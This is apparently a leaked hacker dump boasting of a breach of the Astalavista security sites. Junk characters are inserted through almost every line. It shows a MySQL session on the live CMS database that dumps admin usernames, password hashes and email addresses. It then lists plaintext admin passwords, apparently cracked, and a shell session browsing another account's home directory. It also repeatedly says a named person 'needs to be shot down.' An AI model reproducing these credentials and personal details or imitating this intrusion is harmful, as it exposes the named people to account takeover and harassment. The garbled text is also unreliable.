$ T+ x4 {# L* I) I <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
$ q9 P g9 O N$ [7 g& ^8 t9 o$ N <docs>http://blogs.law.harvard.edu/tech/rss</docs>
* J. I" X& ? m$ ?# m$ A( ^ <generator>Astalavista.com</generator>
8 _6 L4 C" x% S( X: l9 P <webMaster>info@astalavista.com</webMaster>’ . $items . ‘; i3 A; L2 k( E$ e; ?
</channel>
% g& `! m# x# ?- ^& X</rss>’;
. s$ N) W7 d( O
0 K$ v; A2 N2 ~" [, t: C if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {, ~% F4 ~- _" U# c5 g. b5 u' w$ I
unlink (FULLPATH . ‘/feed/exploits.xml’);
7 D: R4 d5 _ b% r) e }
* J) f) g4 T1 G( k3 T6 X% e4 X$ z- `
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);" z h5 s& n0 G5 v; \+ v* \& s
[snip]5 ]) k! y5 U' W9 c8 Z
/ X8 ]- V9 i( h# t9 n
sh-3.2$ cat exploits.sh$ D1 O* R+ O8 b; U0 P d
#!/bin/sh! a, H1 [1 a' G0 R
3 ?) k! `9 `4 q" D$ G6 [###########################################################+ }7 k" j9 y$ }1 x
# #/ Q. H! \: T' D6 P
# Title: milw0rm exploits adder #
$ [9 Q9 t3 j/ m0 i: T# Description: Add all milw0rm exploits to the #
/ M" w% A3 \4 m" a" A& L4 U# Astalavista.com database #
/ @4 U+ p5 s7 ]% n# #, [/ R+ l! ?4 b6 \
# Company: Astalavista Group #
! D5 m6 ^8 y' ^% |# Author: Paulo M. Santos #
% S5 v% Q& ]# R* | }, @# E-Mail: 链接标记paulo.santos@astalavista.ch #
9 Q5 ^6 q! @. `3 T; I) f8 q4 ~# #9 `( ^3 s7 Q; i( E7 d: ^' U( A
###########################################################
+ k8 D Q. v( ~0 _4 i) a
" T( d8 Y, p0 d" m# n% J# path7 q1 y3 j9 C; E+ w. h/ p) a( ]' X
this_path=/home/com/public_html/modifications/cronjobs/ X% t; A b6 W' L
: n J$ y' V* Q+ E6 Q# change directory9 t |0 P, S+ J
cd $this_path6 K1 }0 ?- @% k! T. K6 b3 w
cd tmp/% F! S/ ?- p. d
' P6 ~3 R1 k* f' Z
# delete files
! ~. I2 o: K! ^& U: Zrm -rf milw0rm.tar.* &
/ n/ a3 i/ ]( J4 C5 trm -rf milw0rm/ &
; S: F! D8 k+ \3 D% G
5 r! J/ P, E* ?1 g' N2 s# E- X; K. z# wget milw0rm paket" E* \0 l# {: Q5 p7 G
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
) i# m" `" C0 S2 E; u" O' }& [- O2 r( l' j- W$ `( l
# extract milw0rm paket
7 u. P. k+ r9 W7 Gtar -xvf milw0rm.tar.bz21 F6 R+ M6 d5 n1 ~* ~" U. t
5 k" B6 O& O7 x) l6 Y
# change owner& t' {& R5 s: _5 \5 x) l: s: p; }
chown -R com .
4 v5 F. |% C+ Y4 _7 O4 {4 s) schgrp -R com .
1 L' ?) k! i; ~! y7 k' Z! U+ Z2 C
# execute php script1 ^* x8 | r: e2 W: ^2 ~
cd $this_path
4 q+ q- K5 c* R b/ p0 sphp -q exploits.php
5 l% M7 J% F8 o1 k9 Q
0 ~4 U# i f% t T# delete files
! E; {* O1 n. |& R, mrm -rf tmp/milw0rm.tar.*
- v. M2 U+ X( B6 N, g4 c, X' xrm -rf tmp/milw0rm/
$ i* N" a4 ~' J& N9 e
- S; k2 o2 T' T5 i" K" qsh-3.2$ echo “Paulo M. Santos needs to be shot down.”0 L( D( @% O! a, ~* k
Paulo M. Santos needs to be shot down.( d+ O& u, O) \! J0 d+ @3 K; W" L
5 l( m4 E/ E2 v' i; w O* F$ Rmysql -u contrexxuser2 -p9 n$ S3 j0 K8 C) M+ H" U
Enter password:
( n+ f2 V& u, U0 ?7 n0 ]8 m/ pWelcome to the MySQL monitor. Commands end with ; or \g.
5 X- K, K, Z# {5 ^Your MySQL connection id is 261694
2 [, G9 B* M2 `5 _2 O$ y' {Server version: 5.0.45-community-log MySQL Community Edition (GPL)
' K3 o4 Z9 f% e, D2 [: u: r7 L4 e7 @3 [+ F7 P+ U* K, v# K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
" }1 h$ D6 s! o& l4 R
# `" C8 |# c7 m* {9 _& bmysql> show databases;& A: q$ F2 a+ ?! M& U" W
+——————–+) ~- K8 N U7 f) t1 j" x- ?7 m
| Database |
& I8 e" ]; P9 P" W. F$ q7 w) k+——————–+' t" \; a+ C" W- F
| information_schema |* |; U" S! N) g3 S/ a5 L8 m- L
| com_contrexx2 | r, W# e V8 U( P2 O- D5 y! H( P
| com_contrexx2_live |. Y# e4 S. A6 v8 o, z
| test |% A/ Q* G# ^! H! ~* W; C0 M. ~
+——————–+
7 m: w) j* n0 z& `$ U! X% N7 w; D2 M* ~4 rows in set (0.00 sec)* @; [; s1 g2 X5 l& j6 k" f
% D0 r/ ~. [' ~3 ~% y5 K$ l
mysql> use com_contrexx2_live
. u6 b6 Q) Z3 h; o9 UDatabase changed
5 w6 ]/ p0 ~$ H9 `9 j: Vmysql> show tables;' h7 F/ x3 n0 R9 N
+————————————————–+
+ M- b' |$ M% R) ~1 ~| Tables_in_com_contrexx2_live |
+ T0 L# r* O# O9 A0 P# u% g+ t+————————————————–+
* h. O- K4 N" G| cc_banner_counter |
2 y# r. H7 I" p6 n; w; P" u| cc_search_counter |
# l+ X- j! \9 n| contrexx_access_group_dynamic_ids |
% ~6 ^; n$ p7 r! G| contrexx_access_group_static_ids |
3 Q, I- ?9 @ {2 N! V1 P6 Y1 z| contrexx_access_rel_user_group |
|8 ~' l b0 u, _7 N8 d| contrexx_access_settings |( h: T% p- K! q# u$ W! U
| contrexx_access_user_attribute |
' C8 E4 N: H$ _ p: I+ U| contrexx_access_user_attribute_name |( E3 `# O7 u/ w/ ?
| contrexx_access_user_attribute_value |% M% j$ [2 A7 `3 O1 \
| contrexx_access_user_core_attribute |
, O% l+ e9 P/ U* H9 Y7 O| contrexx_access_user_groups |
8 T# ~/ _4 T8 L' W, Q3 `& y| contrexx_access_user_mail |- X% N; {' R/ y& W
| contrexx_access_user_profile |
/ ^) E% D" v* @& N1 ~1 M" v| contrexx_access_user_title |: m# R5 j( Y# L
| contrexx_access_user_validity |: [9 ?2 F5 T1 r% X ^( |
| contrexx_access_users |
5 j1 I2 A* t, X2 I& g| contrexx_backend_areas |/ V5 H! F9 v, e( } n
| contrexx_backups |
' X9 h k$ B6 b; G; V% s9 W' l| contrexx_content |
6 B/ t5 p% T- S$ W5 C4 o# b| contrexx_content_history |
' o2 E; _+ J, s4 ?/ w| contrexx_content_logfile |5 Z4 L, f( Y3 }8 B5 G
| contrexx_content_navigation |" d) X1 G+ H& T5 L& g
| contrexx_content_navigation_history |+ L! Z! j" Y6 r
| contrexx_ids | ]8 h8 ^6 q5 |8 t
| contrexx_languages |/ d8 l( P& S$ P" @" \3 }
| contrexx_lib_country |1 Q; b/ p% R2 j1 J7 J+ \$ y+ y
| contrexx_log |+ B& S, V# y8 ?$ y* ~- L5 ?
| contrexx_module_alias_source |
+ o. K0 O+ X! _| contrexx_module_alias_target |; l$ i# H* c1 d8 U3 s
| contrexx_module_block_blocks |' _+ I, M/ v. _% U; t
| contrexx_module_block_rel_lang |2 B! g2 R1 y" R2 {( T' c' j
| contrexx_module_block_rel_pages |
8 s' t# n& y) E| contrexx_module_block_settings |
7 o& t: Z+ d2 {# f1 M& X6 X| contrexx_module_blog_categories |; i5 S) b, W0 _7 Q$ d+ Y
| contrexx_module_blog_comments |5 U$ c( k8 ~& @: m4 G
| contrexx_module_blog_message_to_category |
2 M C! U1 i* a. b( _| contrexx_module_blog_messages |
$ B7 A3 y9 H9 m0 G| contrexx_module_blog_messages_lang |
/ s0 _4 J, x0 U- Y8 ]; x2 N3 {| contrexx_module_blog_networks |( Z9 Z3 Z. v9 x) c2 w
| contrexx_module_blog_networks_lang |- @4 m2 k; j+ v" [' ^% J" j4 @; [
| contrexx_module_blog_settings |; Q- C8 L8 y$ P7 V
| contrexx_module_blog_votes |* `& A' f$ I K, @- H, A6 h/ Q& f
| contrexx_module_calendar |
2 v# `% }6 D1 {$ ]; O- r| contrexx_module_calendar_access | K5 [2 s! f5 f% M3 [
| contrexx_module_calendar_categories |3 P. z Z7 |! F7 A% e3 Z
| contrexx_module_calendar_form_data |
5 D! I# K8 \% d/ i' V: ~| contrexx_module_calendar_form_fields |( p4 m! o4 C, g' a' K1 g5 y
| contrexx_module_calendar_registrations |
' x3 [7 O3 [1 C9 [| contrexx_module_calendar_settings |/ S; K) D+ L) i7 Y+ A: s: h
| contrexx_module_calendar_style |4 ~' t- @# [' x- A) f* u0 n
| contrexx_module_contact_form |
* M; V: g! j% `| contrexx_module_contact_form_data |# n; c: Q" _, |/ Q2 ]: Q+ C
| contrexx_module_contact_form_field |/ G1 l0 r8 D% B2 ]6 \1 n
| contrexx_module_contact_settings |; f6 Q- q; M+ p8 t8 S
| contrexx_module_data_categories |* u) `' ^# c* G) z
| contrexx_module_data_message_to_category |/ m) u: f8 ~7 A( e) B
| contrexx_module_data_messages |
- _' L7 ?1 e3 S8 _" W8 Z+ P| contrexx_module_data_messages_lang |
$ C3 F8 g7 I) X: E( f8 j/ T) a0 f| contrexx_module_data_placeholders |
- D9 i' ]5 j) }) _0 H| contrexx_module_data_settings |
! ~( S) s3 g2 J| contrexx_module_directory_access |. ?1 i" M8 \9 W' b" v5 h+ E8 y" J5 v6 _
| contrexx_module_directory_categories |0 n+ l# L$ \, ^5 q) ^5 e0 \9 _
| contrexx_module_directory_dir |
b; V) A* n. c o( o| contrexx_module_directory_inputfields |' k1 ~( f& B$ l
| contrexx_module_directory_levels |
% Z- ~, m* g+ l0 k% E- p3 d| contrexx_module_directory_mail |
! T3 N& t/ R$ ]6 R| contrexx_module_directory_rel_dir_cat |1 T; q! Z9 Y) e
| contrexx_module_directory_rel_dir_level |
7 H/ {/ I5 V* B( [! b| contrexx_module_directory_settings |
0 U8 ~: X( p7 b/ h8 L1 {9 x( C| contrexx_module_directory_settings_google |* @9 F* Y7 M7 \/ j
| contrexx_module_directory_vote |+ c2 [: t6 F" p Z' z
| contrexx_module_docsys |7 d Y% l' Z" L& |
| contrexx_module_docsys_categories |
2 L0 _3 D- e% D& d4 h1 L! c| contrexx_module_egov_configuration |
( m/ \4 C% M# f) i| contrexx_module_egov_orders |
2 A) p& d$ L2 P$ C7 l3 A| contrexx_module_egov_product_calendar |
5 @, Y4 {& T6 P3 E# ?6 t| contrexx_module_egov_product_fields |% J4 J- r# p' I% G0 O1 F
| contrexx_module_egov_products |2 U, F* o% x( X
| contrexx_module_egov_settings |; t+ T% i3 t% s$ `: C- L
| contrexx_module_exploits |
6 \: J' {+ {3 ]( G| contrexx_module_exploits_categories |9 m) }, N9 e3 h* {! B: f- I8 L
| contrexx_module_feed_category |& S: \1 M* p$ v( w: @# b3 B
| contrexx_module_feed_news |3 G& j8 ~7 r. @4 p
| contrexx_module_feed_newsml_association |
2 F2 K2 t, y$ k5 W; p| contrexx_module_feed_newsml_categories |1 W/ b1 K# _( P2 ]* d
| contrexx_module_feed_newsml_documents |
& o' h \4 \) d( a9 }8 P| contrexx_module_feed_newsml_providers |# g5 P# [5 q- q
| contrexx_module_forum_access |1 }( g" h3 T4 W% Y% B$ o
| contrexx_module_forum_categories |! c' |% A/ P, [* D* u. O6 d
| contrexx_module_forum_categories_lang |
! s+ l- L3 i6 \9 @' c| contrexx_module_forum_notification |2 @ e. R D3 ?0 V7 S
| contrexx_module_forum_postings |
& c, j# J8 u6 j4 z: _| contrexx_module_forum_rating |
1 `1 @# f4 J N# g' K1 b| contrexx_module_forum_settings |+ @; g0 \) [) h& ^1 c
| contrexx_module_forum_statistics |! }7 d7 n, i2 ]+ }/ r: i' g
| contrexx_module_gallery_categories |
: q8 q; d! U K0 D8 U7 a- i4 S& i| contrexx_module_gallery_comments |3 M8 }1 \& w6 x+ {, p
| contrexx_module_gallery_language |
' H4 M, I. |7 E8 B| contrexx_module_gallery_language_pics |
2 c* X F1 _( s, U" L| contrexx_module_gallery_pictures |
& D$ m7 D% ]/ A; x( a% ^| contrexx_module_gallery_settings |
: \! F1 `7 B) G$ J| contrexx_module_gallery_votes |, ?$ ~+ N; R( J2 {* K" g+ `
| contrexx_module_guestbook |
8 a% Y* ~: A4 |8 b; x9 K0 K1 {| contrexx_module_guestbook_settings |
8 O5 P9 p% k4 C* v' X$ q| contrexx_module_livecam |! W" i, f; m5 R& V& f. H
| contrexx_module_livecam_settings |6 n% ~/ M* d: A% i
| contrexx_module_market |3 O; Q. O+ \7 m" T9 m3 ^/ ?0 t3 z
| contrexx_module_market_access |( r; `/ r9 }' d" y5 t; P
| contrexx_module_market_categories |
( W, Z6 B1 t; H& l3 L8 R% c8 f| contrexx_module_market_mail |
2 _) P$ R9 |8 e7 c| contrexx_module_market_paypal |
, F& ^/ j) V' c9 B) A0 j3 P1 X| contrexx_module_market_settings |
( m5 U2 e9 ?& ]3 i| contrexx_module_market_spez_fields |* o4 R# t9 Y% f& l3 s& W
| contrexx_module_mediadir_access |
$ G+ w0 o/ }4 N( O v: ^6 @| contrexx_module_mediadir_categories |
. O8 s. s( U( z: B| contrexx_module_mediadir_comments |
% H" ^6 M6 @+ ?| contrexx_module_mediadir_dir |
E* M- w3 }" [, a4 e& y; T3 o| contrexx_module_mediadir_inputfields |4 F& w0 l3 c$ j! H9 W, U- j) k
| contrexx_module_mediadir_levels |' P; ]3 J+ P( X8 T5 Q5 _9 H
| contrexx_module_mediadir_mail |
6 p9 D+ a/ V. O: H' U# i| contrexx_module_mediadir_rel_dir_cat |
8 b! i* h" q# j ?| contrexx_module_mediadir_rel_dir_level |2 Z p' S. ?) X0 p
| contrexx_module_mediadir_reports |
) E4 s7 H$ H6 s& e; u| contrexx_module_mediadir_settings |
4 c3 t ~! v- ~0 g# ?5 [* x| contrexx_module_mediadir_settings_google |( t8 a6 _( \6 ]- `6 j. `
| contrexx_module_mediadir_vote |
+ q$ c. N. O! O+ V| contrexx_module_memberdir_directories |; y. N0 b3 d3 `0 h
| contrexx_module_memberdir_name |' b- t5 u7 P V9 S
| contrexx_module_memberdir_settings |
$ u9 s4 @6 I3 p# g6 j* X" A$ n| contrexx_module_memberdir_values |
& u9 X0 D6 Z8 M3 X# m( I6 I; i| contrexx_module_nettools_allowed_groups |
5 W, v' A) @1 H2 H8 t$ T9 Y x| contrexx_module_nettools_settings |
" O, q$ p7 |9 G| contrexx_module_news |8 N9 O, I- b0 V7 j% d( P0 ^1 u1 V
| contrexx_module_news_access |
; n8 D- b# J \ Q| contrexx_module_news_categories |2 M" b+ ^ P# W3 k+ n
| contrexx_module_news_settings |
+ f: c, s- h5 m| contrexx_module_news_teaser_frame |
9 f* K7 w$ p( m5 h| contrexx_module_news_teaser_frame_templates |
" p7 p5 ~+ q5 y1 X# {# x| contrexx_module_news_ticker |. `' i, P4 z, d. e- ^ y P8 T
| contrexx_module_newsletter |
4 L: l& R8 j9 t) j: h1 ?| contrexx_module_newsletter_attachment |* n; ^( v4 l' Q6 `8 O, p0 J
| contrexx_module_newsletter_category |. I# i$ B8 V; L
| contrexx_module_newsletter_confirm_mail |
; b! }7 B- k; w0 j' \" b| contrexx_module_newsletter_rel_cat_news |0 {; z& w; \& \& F! R k" `, Y
| contrexx_module_newsletter_rel_user_cat |
5 _2 e3 r; v- a7 u| contrexx_module_newsletter_settings |: W( Z, d! ^% x& }: i! _' l) h
| contrexx_module_newsletter_template |
! j' [7 \/ r9 l0 b| contrexx_module_newsletter_tmp_sending |' U: [) P0 ` F$ c( Y ?, y4 ~
| contrexx_module_newsletter_user |
% o6 u8 d! S3 H' D% z3 B8 d) \- t& G| contrexx_module_newsletter_user_title |
; `6 n( y7 |6 |( E# y c2 Y| contrexx_module_onlinetools_defaultports |
7 @2 @) v( S" D1 H/ \| contrexx_module_onlinetools_defaultports_back |
2 A& J7 ?2 U2 \| contrexx_module_onlinetools_geolitecity_blocks |* T5 q# ~" C: H0 P0 D, g
| contrexx_module_onlinetools_geolitecity_country |( B9 }* M& g1 f e$ J
| contrexx_module_onlinetools_geolitecity_location |
. f- F4 u! M1 G- x T* W+ J* l| contrexx_module_podcast_category |! n+ `( a: s% H& v8 E/ P2 W: U
| contrexx_module_podcast_medium |# g5 D6 i3 Y" f1 ^# g
| contrexx_module_podcast_rel_category_lang |
! Q" O: @4 V/ O* M| contrexx_module_podcast_rel_medium_category |8 m# ^9 B! v' y: a% U. q) s/ K
| contrexx_module_podcast_settings |9 q. |5 X3 l! |2 ?
| contrexx_module_podcast_template |
1 _, _9 n+ i, e| contrexx_module_proxydb |: V9 \; J5 g* ^$ c' \- j7 `6 C# {+ ^
| contrexx_module_recommend |" S" H: x- Y/ p( J# Z7 m# a/ g8 I) ]
| contrexx_module_repository |
C4 a% W8 ]/ K. S| contrexx_module_securitynews_cats |
" N1 z* T: y/ e8 U| contrexx_module_securitynews_feeds |
* |, |% y9 R: g! m n1 }0 y+ N| contrexx_module_securitynews_news |- G* o& _ t, T; F( ]4 m
| contrexx_module_shop_categories | \$ A6 @; F/ d
| contrexx_module_shop_config |
( Y% O0 R9 o1 p; d2 z$ q( s| contrexx_module_shop_countries |) [5 e+ Y* j6 D$ M
| contrexx_module_shop_currencies |
) }$ s6 M' |9 c% Q) V: Q| contrexx_module_shop_customers |
% B6 |, ^* k2 s) t3 O, n| contrexx_module_shop_importimg |+ d, e6 e/ X& p& K
| contrexx_module_shop_lsv |, v6 ]$ {- X$ {) a4 T7 W1 b
| contrexx_module_shop_mail |: G4 ~; J) O2 n
| contrexx_module_shop_mail_content |
e0 q- E9 K* ]1 N9 H9 `| contrexx_module_shop_manufacturer |$ n7 v6 k0 b7 Z: q: }1 N) n+ V
| contrexx_module_shop_order_items |
; z( F) i0 W5 \0 e8 g| contrexx_module_shop_order_items_attributes |
. a( q/ [, n i. p. D, N3 X" p| contrexx_module_shop_orders |
+ v# X$ |9 x7 }8 x& u5 n% r" a0 N' f| contrexx_module_shop_payment |
/ |+ D; p& E1 f% N- g| contrexx_module_shop_payment_processors |
$ L4 q5 R4 c/ P. u: V. ]| contrexx_module_shop_pricelists | c9 H( \6 s5 u+ C
| contrexx_module_shop_products |8 h% Q0 {8 h( b, _& j/ R6 h
| contrexx_module_shop_products_attributes |
1 q9 q! W( [, L4 \) K| contrexx_module_shop_products_attributes_name |6 c: B1 ?8 T4 r# k+ X; O
| contrexx_module_shop_products_attributes_value |* o8 C8 B* s; R# R* W+ _/ J) F
| contrexx_module_shop_products_downloads |
% p, B+ }* |- A$ ?$ c+ q$ W| contrexx_module_shop_rel_countries |# D8 _% s8 L& d0 i
| contrexx_module_shop_rel_payment |% m5 F3 v ~& G8 C* W) e
| contrexx_module_shop_rel_shipment |
6 G& U! D; i+ Y| contrexx_module_shop_shipment_cost |1 {3 [1 c8 `; {) w, k Y/ P0 f: X
| contrexx_module_shop_shipper |/ R% \) p: }4 N8 q' U' U
| contrexx_module_shop_vat |
* S5 _" `( G" R% b, R6 b$ u| contrexx_module_shop_zones |& c; P- A/ I+ R" J2 d% M
| contrexx_module_u2u_address_list |
?0 {" l4 X; k# h1 w( T# B| contrexx_module_u2u_message_log |7 l2 x1 x4 |+ W( p2 s7 D+ z
| contrexx_module_u2u_sent_messages |$ D1 v6 O, d- ~, z6 {3 U. R& b
| contrexx_module_u2u_settings |
: {& f9 z( [* r7 S6 Q$ t5 M8 w$ h| contrexx_module_u2u_user_log |9 A* S7 ?: O1 N1 |8 ]. K. _$ N
| contrexx_modules |3 A. ^) h) v F& Q' C. F% @
| contrexx_sessions |
9 B9 _) Q* P }3 e( B" B D| contrexx_settings |, k- a/ A/ F; U9 a
| contrexx_settings_smtp |/ B( Q9 s6 K; {* k6 b/ o9 U$ H
| contrexx_skins |' Z) N% E; W2 c. n1 |
| contrexx_stats_browser |
( t- x3 _- S" }| contrexx_stats_colourdepth |
* B" ?) s! p" c! x) v" l3 h1 H| contrexx_stats_config |
, S! r1 h; j) Z& s| contrexx_stats_country |
, @7 b# B' V0 F5 T9 R. a. w. ]( q| contrexx_stats_hostname |
' |& p; i; r! e% A! A| contrexx_stats_javascript |& x5 n8 a% ?) j: D3 K
| contrexx_stats_operatingsystem |
( H2 b' |0 O' c( _9 a9 H| contrexx_stats_referer |
- m X7 O& d$ l2 I: L$ Z| contrexx_stats_requests |
1 g, c7 k8 I; L4 K! `| contrexx_stats_requests_summary |
$ u; T8 y1 G) k# S| contrexx_stats_screenresolution |
0 C6 r/ X. o; X7 q| contrexx_stats_search |- \2 }. I) g& {9 g
| contrexx_stats_spiders |
: {" |, C2 I. r8 H' l7 Z4 i| contrexx_stats_spiders_summary |" {7 @' }8 C. z# s$ `
| contrexx_stats_visitors |
, o. A+ L% Z, M| contrexx_stats_visitors_summary |1 O+ l; F+ R( S" o! |9 r
| contrexx_voting_additionaldata |
3 ^3 o* N4 n. Q9 A| contrexx_voting_email |. E% E' {. Z. J$ x# s# g$ G$ S; v
| contrexx_voting_rel_email_system |! X2 v6 x/ d3 |1 Y7 T) c5 @
| contrexx_voting_results |3 A; M: o$ Y7 r( J0 c
| contrexx_voting_system |8 M# p1 a" J7 Y. t+ ~7 H
| foo |
j# v+ [/ e1 j) e8 Z+————————————————–+
& A4 s$ P5 I9 e$ O7 z) M227 rows in set (0.01 sec)
5 k' G) s8 G0 {) ]. U+ O$ n9 |
5 S! e2 Q, D5 Kmysql> select count(*) as skids from contrexx_access_users;( r# {" `8 X# ]$ ]! P
+——-+1 \+ f' l, U1 |$ O8 Z
| skids |" D: D% h0 S2 f1 v& p1 F
+——-+2 f! @' i) Y* b/ D7 O9 }
| 53699 |
\3 H9 D+ d+ a9 ]+——-+# d0 e, V& M4 j( I: w
1 row in set (0.00 sec)% n0 i3 o: j, M) `
" i" r3 {3 f2 [% O- P4 Amysql> describe contrexx_access_users;
3 Y1 \6 _- F9 l/ Y2 E+——————+——————————————+——+—–+————–+—————-+
# c W8 t2 z1 q6 X* N; s| Field | Type | Null | Key | Default | Extra |
2 _) K( r7 |3 c+——————+——————————————+——+—–+————–+—————-+* R F/ Q% y" [$ ~, a6 P, J( r7 y
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) E3 R# n) {- o$ U
| is_admin | tinyint(1) unsigned | NO | | 0 | |
. e. E+ g* ~( ]| username | varchar(40) | YES | MUL | NULL | | k' @$ T9 W5 X J7 n, y# F
| password | varchar(32) | YES | | NULL | | r, i* [2 E! w7 e; Y- Y M6 W6 y4 N- m
| regdate | int(14) unsigned | NO | | 0 | |
5 B" _% \7 b+ t+ Y- f/ _6 y8 d| expiration | int(14) unsigned | NO | | 0 | |2 Z" a0 J) M. D
| validity | int(10) unsigned | NO | | 0 | |
5 l0 }$ {/ r: t! l" B: L: S| last_auth | int(14) unsigned | NO | | 0 | |; ~* e( V! g3 X" J! o% w
| last_activity | int(14) unsigned | NO | | 0 | |) l, i& f C, z& k
| email | varchar(255) | YES | | NULL | |
) ?$ {- N0 O0 s. {# S| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |" }; ^- q, t6 Q% W! I7 C' l1 W
| frontend_lang_id | int(2) unsigned | NO | | 0 | |0 o" c: G t: [2 p- e) |" B* ^' T! I0 K$ k
| backend_lang_id | int(2) unsigned | NO | | 0 | |+ l3 {! W+ @8 s8 j* M5 V
| active | tinyint(1) | NO | | 0 | |
B: q: p( V4 y9 ?| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |+ ~: e, B" u- k! W" e5 Y: E) ~
| restore_key | varchar(32) | NO | | | |
% s: J3 m+ \% C| restore_key_time | int(14) unsigned | NO | | 0 | |' Y; ~( I! s- b4 _- G
| u2u_active | enum(’0′,’1′) | NO | | 1 | |8 t1 A3 J; _3 a! J
+——————+——————————————+——+—–+————–+—————-+# S' T! I6 A6 e$ d) N- B ?
18 rows in set (0.00 sec)7 L2 L. f( J1 n: P( Z
- ~$ D: Q o# S' g2 Rmysql> select username,password,email from contrexx_access_users where is_admin = 1;
C, E% p7 E9 F) w+————+———————————-+—————————–+
* U0 ?6 c" A9 S. M2 w% u4 {| username | password | email |
# H% ^5 W$ q' e. L3 e* i+————+———————————-+—————————–+
6 b9 Q3 h+ i, N, {# z1 ?| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
& a7 [1 \$ O% K, _- O0 H# ]| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
/ }9 |2 y# h' k( g0 }+ U# ~| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |' L8 S+ c+ d' D9 Y; r0 C3 n4 f
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
J- M" B r* g/ K+————+———————————-+—————————–+
' Z0 |" o! ^" ~4 b- I4 rows in set (0.04 sec)
4 a; H) V. H# w
9 G* ]% \6 H0 I3 i. H' f4 ^% Ymysql> exit;3 O$ I7 o0 u$ b$ D& o2 y2 n
Bye! h/ E& A- c: M/ S7 Z
# |3 w' D; l; ]# ?
[~] There you go, your “team of security and IT professionals” is a joke.
8 c3 M$ Q- M6 [. @8 }" j3 L
* Y/ d/ u! n" n+——————————+
1 n! T& ~# D% {% q" y* t+ Isystem:f82BN3+_*% f; K4 |! W. D& Q6 w
Be1er0ph0r:belerophor4astacom& _8 X0 F( B/ t5 j& ^3 e; I7 ?
prozac:asta4cms!3 ]! z; V: W- D! n4 w( O+ t
commander:mpbdaagf6m
7 }7 D; l: c# x2 V& z8 j( d x. \sykadul:ak29eral
+ @+ |6 s, t+ a7 l; E+ h6 G+——————————+
: `+ Y5 R' y4 V' Q( C$ \/ c/ F! b" O0 j. k8 i6 t& i9 B- w
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s): z" M0 O) R, b" G! G4 L
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.# J; m- w- z2 P7 L" F* Y/ S0 z
8 R6 Z( V7 R! S$ a) H, O4 C: q
[~] Lets move to astalavista.net now,
* r) G$ u# y2 c) P- R( _3 T3 ^1 D
+ d6 g V9 u4 q8 T- L9 mFrom <链接标记[url]https://www.astalavista.net/[/url]>:
' a7 B, H3 s( e9 m' ^7 N, c>> Everyone knows that the best defense is a good offense.
- p$ m, x& ?; i>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
1 Z9 L+ f$ |$ F6 s) X>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
]" e, K4 x) v" A>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
3 C7 C% x3 ^# z6 O# N: \: @3 f6 b i( x! k
>> Go ahead, try and hack our server . in a completely legal way!
6 a2 X3 u! f) T H2 d& x8 H>> Learn by doing: We offer our members tricky tasks and challenges on an
! R! p$ W! o0 v8 P2 u3 o! ~6 u>> ongoing basis so you can test your knowledge and abilities. You can also
& g5 ^+ ^2 d! s9 e" b+ d- h/ k2 a2 }>> demonstrate what you.ve mastered by taking part in regular hacker contests9 u2 C1 e2 k$ u
>> and war games) O5 |2 X" ]; [5 ^5 @% x
$ a$ H# g8 {# P8 `8 |8 F[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
" Y. ?+ k$ n9 W; G7 M5 ]6 [, T; z6 D' t* c3 W
[-] Tricky task: Find home dir of astalavista.net5 @* P# k" h1 G, b7 r
: [* E+ \2 g$ w7 F% Q* Ush-3.2$ ls -la ~astanet, e. F/ H: B8 U6 Y; f
total 48% Y6 L* T% i& d7 }
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .: o7 w: K6 G! P+ z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 F( \) C. p8 t9 E
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
) {+ A q/ D% z# h-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
! y% y7 k- `( d' t* i# p-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout! }, `' p5 D2 l5 b. @
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
% e1 O2 T# r5 i) Z5 Q4 C-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc' P* D% C: s5 A. e5 O
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains" o; J; \9 F4 p$ j
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
# a$ S( ?6 S- Sdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
) Z6 x5 f1 {2 T; E8 v$ z4 w* Alrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
& d* K+ F) k/ A: f0 E/ ? N-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
2 T' Y+ @& ~7 ?6 c( e/ c% b$ [+ J @0 p! K, z3 b; z5 j
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/$ i5 G/ O. Z, l
sh-3.2$ ls -la
# S7 `3 E" L$ z" Y3 R: \total 200
% b& s" O5 P; m! Y- g3 \3 ]drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
! W/ _9 w7 q) l6 M9 b* Z0 X3 t7 @drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..# r8 y3 L( _+ i
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
0 b& P# y/ O; u$ ?5 |drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
